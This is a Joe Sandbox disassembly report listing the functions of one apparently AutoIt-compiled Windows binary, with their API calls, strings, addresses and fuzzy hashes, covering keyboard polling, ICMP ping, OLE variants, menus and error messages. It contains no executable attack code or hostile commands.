Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 0b6edd0e069b134ccdcdce7c63c734ddeedf1cd7903ccfcde53a9210ac6c03fa
Instruction ID: de204444eb45672ebab9863bf6542c4133ebe5d19e1a20031217fc2dac6980d3
Opcode Fuzzy Hash: 0b6edd0e069b134ccdcdce7c63c734ddeedf1cd7903ccfcde53a9210ac6c03fa
Instruction Fuzzy Hash: C2619D31900608EFDF11CF54CC84DFE7BB9EB8B721F108245F925AA290D7789A80DB60

Function 0076FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0076FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0076FB08
VariantInit.OLEAUT32(?), ref: 0076FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0076FB3A
VariantCopy.OLEAUT32(?,?), ref: 0076FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0076FBA1
VariantClear.OLEAUT32(?), ref: 0076FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0076FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0076FBCC
VariantClear.OLEAUT32(?), ref: 0076FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0076FBE9

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: a51e3726dbcff2d934ad68cc285ea7fba784dcabe92c3cb215bfba4dedb9a95a
Instruction ID: cfc1656868a028d2709063e0e973b9c691d4aaca8aa68b7edbf421f72d861bd1
Opcode Fuzzy Hash: a51e3726dbcff2d934ad68cc285ea7fba784dcabe92c3cb215bfba4dedb9a95a
Instruction Fuzzy Hash: E3415475900119EFCB01DF68D8589ADBFB9FF49354F00C065E906A7251CB38A945CF94

Function 00779C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00779CA1
GetAsyncKeyState.USER32(000000A0), ref: 00779D22
GetKeyState.USER32(000000A0), ref: 00779D3D
GetAsyncKeyState.USER32(000000A1), ref: 00779D57
GetKeyState.USER32(000000A1), ref: 00779D6C
GetAsyncKeyState.USER32(00000011), ref: 00779D84
GetKeyState.USER32(00000011), ref: 00779D96
GetAsyncKeyState.USER32(00000012), ref: 00779DAE
GetKeyState.USER32(00000012), ref: 00779DC0
GetAsyncKeyState.USER32(0000005B), ref: 00779DD8
GetKeyState.USER32(0000005B), ref: 00779DEA

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d88205d8b2a43ea41832cba4dae28516970f65b1467d1d29d8b1aaa19f112197
Instruction ID: a34b9af03e56ca108fcf7fd684ac3f68c4a5163906ba4c6e4a1b0f753623f224
Opcode Fuzzy Hash: d88205d8b2a43ea41832cba4dae28516970f65b1467d1d29d8b1aaa19f112197
Instruction Fuzzy Hash: 8A41EB346057C96DFF31877484043B5BEA06F12384F08C05ADBCA566C2EBEC99D4C7A2

Function 0079055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007905BC
inet_addr.WSOCK32(?), ref: 0079061C
gethostbyname.WSOCK32(?), ref: 00790628
IcmpCreateFile.IPHLPAPI ref: 00790636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007906C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007906E5
IcmpCloseHandle.IPHLPAPI(?), ref: 007907B9
WSACleanup.WSOCK32 ref: 007907BF

Strings

Ping, xrefs: 00790676

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 562b6d4b6aba06a7147fa4c05cd4b1a056142e7f9b8d05a8403390e0b6e74c38
Instruction ID: ec90d4ccca555170b95abd6d23679d94407de49c2155d58e49524ca47fcbaed3
Opcode Fuzzy Hash: 562b6d4b6aba06a7147fa4c05cd4b1a056142e7f9b8d05a8403390e0b6e74c38
Instruction Fuzzy Hash: 8E918F75614201EFDB20CF19E488F16BBE0AF84328F1585A9E4698B6A2C738EC41CFD1

Function 00798CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00798CF3

Part of subcall function 00778E54: _wcslen.LIBCMT ref: 00778E77

_wcslen.LIBCMT ref: 00798D4E
_wcslen.LIBCMT ref: 00798D9C
_wcslen.LIBCMT ref: 00798DDC
_wcslen.LIBCMT ref: 00798E6E

Strings

cdecl, xrefs: 00798D48, 00798D4D
winapi, xrefs: 00798D96, 00798D9B
stdcall, xrefs: 00798DD6, 00798DDB
none, xrefs: 00798E65, 00798E6A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: b26d95b1406ff9adae0b60c5bfb1601feba799f053981d0f7e3d48299e3a11d3
Instruction ID: 68b8f763237af72f3898132b6ccb41d26f01dd23ee748aa11ebd05fe0c4bbd78
Opcode Fuzzy Hash: b26d95b1406ff9adae0b60c5bfb1601feba799f053981d0f7e3d48299e3a11d3
Instruction Fuzzy Hash: 1B51C131A00116EBCF54DF6CD9519BEB3A5BF6A320B204229E526E73C4EB39ED40C791

Function 0079372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00793774
CoUninitialize.OLE32 ref: 0079377F
CoCreateInstance.OLE32(?,00000000,00000017,007AFB78,?), ref: 007937D9
IIDFromString.OLE32(?,?), ref: 0079384C
VariantInit.OLEAUT32(?), ref: 007938E4
VariantClear.OLEAUT32(?), ref: 00793936

Strings

Invalid parameter, xrefs: 00793865
NULL Pointer assignment, xrefs: 0079381E
Failed to create object, xrefs: 007937E4, 0079389A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 1bc51be3fdb8f964dcaaa18552aadd8a58a65c20271358b01975bb9818285fa1
Instruction ID: 8449756ee865153a3acd7457757dd13fa9854e49ea10fd2cb126d6ae603342a5
Opcode Fuzzy Hash: 1bc51be3fdb8f964dcaaa18552aadd8a58a65c20271358b01975bb9818285fa1
Instruction Fuzzy Hash: D7618FB0608301EFDB11DF54D889F6ABBE4EF49714F004909F5859B291D778EE48CBA6

Function 007A8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

Part of subcall function 0072912D: GetCursorPos.USER32(?), ref: 00729141
Part of subcall function 0072912D: ScreenToClient.USER32(00000000,?), ref: 0072915E
Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000001), ref: 00729183
Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000002), ref: 0072919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 007A8B6B
ImageList_EndDrag.COMCTL32 ref: 007A8B71
ReleaseCapture.USER32 ref: 007A8B77
SetWindowTextW.USER32(?,00000000), ref: 007A8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007A8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 007A8CFF

Strings

p#~, xrefs: 007A8C71
@GUI_DRAGFILE, xrefs: 007A8C9A
@GUI_DROPID, xrefs: 007A8C51

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#~
API String ID: 1924731296-3409604630
Opcode ID: 8255ba0aaf7c231f97c13b8aac4d37a3812434eb68fd9cbce53fb4bb455993db
Instruction ID: ed1551fdfae6f596526a212bd0d8db7b5f21afde6841b8e8d1def75c97cb6759
Opcode Fuzzy Hash: 8255ba0aaf7c231f97c13b8aac4d37a3812434eb68fd9cbce53fb4bb455993db
Instruction Fuzzy Hash: 8E519B71105340EFD704DF24DC9AFAA77E4FB89710F400669F992572E2DB78AA44CB62

Function 00783388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007833CF

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007833F0

Strings

^ ERROR , xrefs: 0078349E
Incorrect parameters to object property !, xrefs: 007834AB
"%s" (%d) : ==> %s:%s%s, xrefs: 00783504
Error: , xrefs: 007834D1
Line %d (File "%s"):, xrefs: 00783443, 0078345C
"%s" (%d) : ==> %s:, xrefs: 00783522

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: ef6ffc1a3a1f288eda3197cd8ea4a66574c874287eafcc9e767970e98d3def38
Instruction ID: dcb822214164a15fb6e55ac32d2eeeb22b5a04948406def78c38482f842510f5
Opcode Fuzzy Hash: ef6ffc1a3a1f288eda3197cd8ea4a66574c874287eafcc9e767970e98d3def38
Instruction Fuzzy Hash: 0151A1B1801209FADF15EBA4CD5AEEEB778AF04740F108065F50972191EB3D2F98DB60

Function 0077B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0077B5FC
_wcslen.LIBCMT ref: 0077B608
_wcslen.LIBCMT ref: 0077B64D
_wcslen.LIBCMT ref: 0077B68C
_wcslen.LIBCMT ref: 0077B6C7

Strings

KEYS, xrefs: 0077B647, 0077B64C
REMOVE, xrefs: 0077B602, 0077B607
APPEND, xrefs: 0077B6C1, 0077B6C6
EXISTS, xrefs: 0077B686, 0077B68B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: fdf75f613284c4c4ebdc7cc58e3938fb600a7d2313240745d94afb35de0f9226
Instruction ID: 0234136423d9755658c416cb3a812a16d69a0f2f1585bf5f15205fbe7df9d44d
Opcode Fuzzy Hash: fdf75f613284c4c4ebdc7cc58e3938fb600a7d2313240745d94afb35de0f9226
Instruction Fuzzy Hash: E641DB32A00126DBCF105F7DC8906BE77B5AFA17E4B24812AE629D7284E73DDD81C790

Function 00785393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007853A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00785416
GetLastError.KERNEL32 ref: 00785420
SetErrorMode.KERNEL32(00000000,READY), ref: 007854A7

Strings

INVALID, xrefs: 00785459
NOTREADY, xrefs: 0078544B
READONLY, xrefs: 00785452
READY, xrefs: 00785460, 00785468
UNKNOWN, xrefs: 00785444

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 06a6bbcbf2ee43283ec7805604b052b28a087f430dec391e557d3db823d77cff
Instruction ID: 5b47cbfa90dfdfe6d3ba97940a1ad761a30be29dc75deea0d3c9f9ac0b2d7c4e
Opcode Fuzzy Hash: 06a6bbcbf2ee43283ec7805604b052b28a087f430dec391e557d3db823d77cff
Instruction Fuzzy Hash: 8E31C375A40644EFDB10EF68C488AAABBF4FF45305F148065E509CB392DB79DD86CB90

Function 007A3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 007A3C79
SetMenu.USER32(?,00000000), ref: 007A3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A3D10
IsMenu.USER32(?), ref: 007A3D24
CreatePopupMenu.USER32 ref: 007A3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A3D5B
DrawMenuBar.USER32 ref: 007A3D63

Strings

F, xrefs: 007A3D4E
0, xrefs: 007A3C54

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 2c3cf050c0897e2bee7e8e8cde114fa81defd51c1498f9994f559ceadbc08ffe
Instruction ID: cb37d3cb225638b8564d07d2185cab250dc1e193453b521516427f702c21a6c0
Opcode Fuzzy Hash: 2c3cf050c0897e2bee7e8e8cde114fa81defd51c1498f9994f559ceadbc08ffe
Instruction Fuzzy Hash: 10416B75A01209EFDB14CF64D884EEA7BB5FF8A351F144129F946A7360D738AA10CF94

Function 007A3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007A3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007A3AA0
GetWindowLongW.USER32(?,000000F0), ref: 007A3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007A3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 007A3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 007A3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 007A3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 007A3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007A3C13

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 8878165e2fbb03f15021f7bedb0ed621ad4a0b4a3b100f133a51872119bba73d
Instruction ID: f5977a6a3632517722006a40c6ef30ed1361ad8613f2146a7ef80ae23c68d3da
Opcode Fuzzy Hash: 8878165e2fbb03f15021f7bedb0ed621ad4a0b4a3b100f133a51872119bba73d
Instruction Fuzzy Hash: 09618E75900248EFDB10DF68CC81EEE77F8EB49710F104199FA15AB291C778AE41DB60

Function 0077B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0077B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B165
GetWindowThreadProcessId.USER32(00000000), ref: 0077B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0077B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0077A1E1,?,00000001), ref: 0077B21D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2ba24b83eae2e55d404b625ca3df072aa898b403cfb74af5beb41f99899044cf
Instruction ID: 9e553bdb81490b2954950294fbf33e7f4b49b7653afcbdd327f3dc05a9c1e26d
Opcode Fuzzy Hash: 2ba24b83eae2e55d404b625ca3df072aa898b403cfb74af5beb41f99899044cf
Instruction Fuzzy Hash: D831BD71501208BFDF119F24DC89B6D7BAABB96395F10C804FA08DB191D7BC9E008F68

Function 00742C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00742C94

Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0

_free.LIBCMT ref: 00742CA0
_free.LIBCMT ref: 00742CAB
_free.LIBCMT ref: 00742CB6
_free.LIBCMT ref: 00742CC1
_free.LIBCMT ref: 00742CCC
_free.LIBCMT ref: 00742CD7
_free.LIBCMT ref: 00742CE2
_free.LIBCMT ref: 00742CED
_free.LIBCMT ref: 00742CFB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ce7b3cc3c49480840254e3318bbd9c4c20df97c8dca47403a806ebe281e5e7f3
Instruction ID: b6a43f5aa0e407b4ce2e8f7a30c21fcd7a924bc9f2c1cbcabb2f7372238f5c79
Opcode Fuzzy Hash: ce7b3cc3c49480840254e3318bbd9c4c20df97c8dca47403a806ebe281e5e7f3
Instruction Fuzzy Hash: A9118076100108EFDB02EF55D886CDD3BA5FF05350F9144A5FA48AB232DB35EA619F90

Function 00711410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00711459
OleUninitialize.OLE32(?,00000000), ref: 007114F8
UnregisterHotKey.USER32(?), ref: 007116DD
DestroyWindow.USER32(?), ref: 007524B9
FreeLibrary.KERNEL32(?), ref: 0075251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0075254B

Strings

close all, xrefs: 00711454

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f366081f275ce6735d29d8c43941ec1709d2f1ab6849a7f2b504227d73928936
Instruction ID: 540d7b52b1be858296832f5b41640ae98a657845887050055c73fbdd30021dd6
Opcode Fuzzy Hash: f366081f275ce6735d29d8c43941ec1709d2f1ab6849a7f2b504227d73928936
Instruction Fuzzy Hash: E9D1A131701212DFCB19EF18C499AA9F7A0BF06701F5441ADE94A6B292DB39EC67CF50

Function 00715BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00715C7A

Part of subcall function 00715D0A: GetClientRect.USER32(?,?), ref: 00715D30
Part of subcall function 00715D0A: GetWindowRect.USER32(?,?), ref: 00715D71
Part of subcall function 00715D0A: ScreenToClient.USER32(?,?), ref: 00715D99

GetDC.USER32 ref: 007546F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00754708
SelectObject.GDI32(00000000,00000000), ref: 00754716
SelectObject.GDI32(00000000,00000000), ref: 0075472B
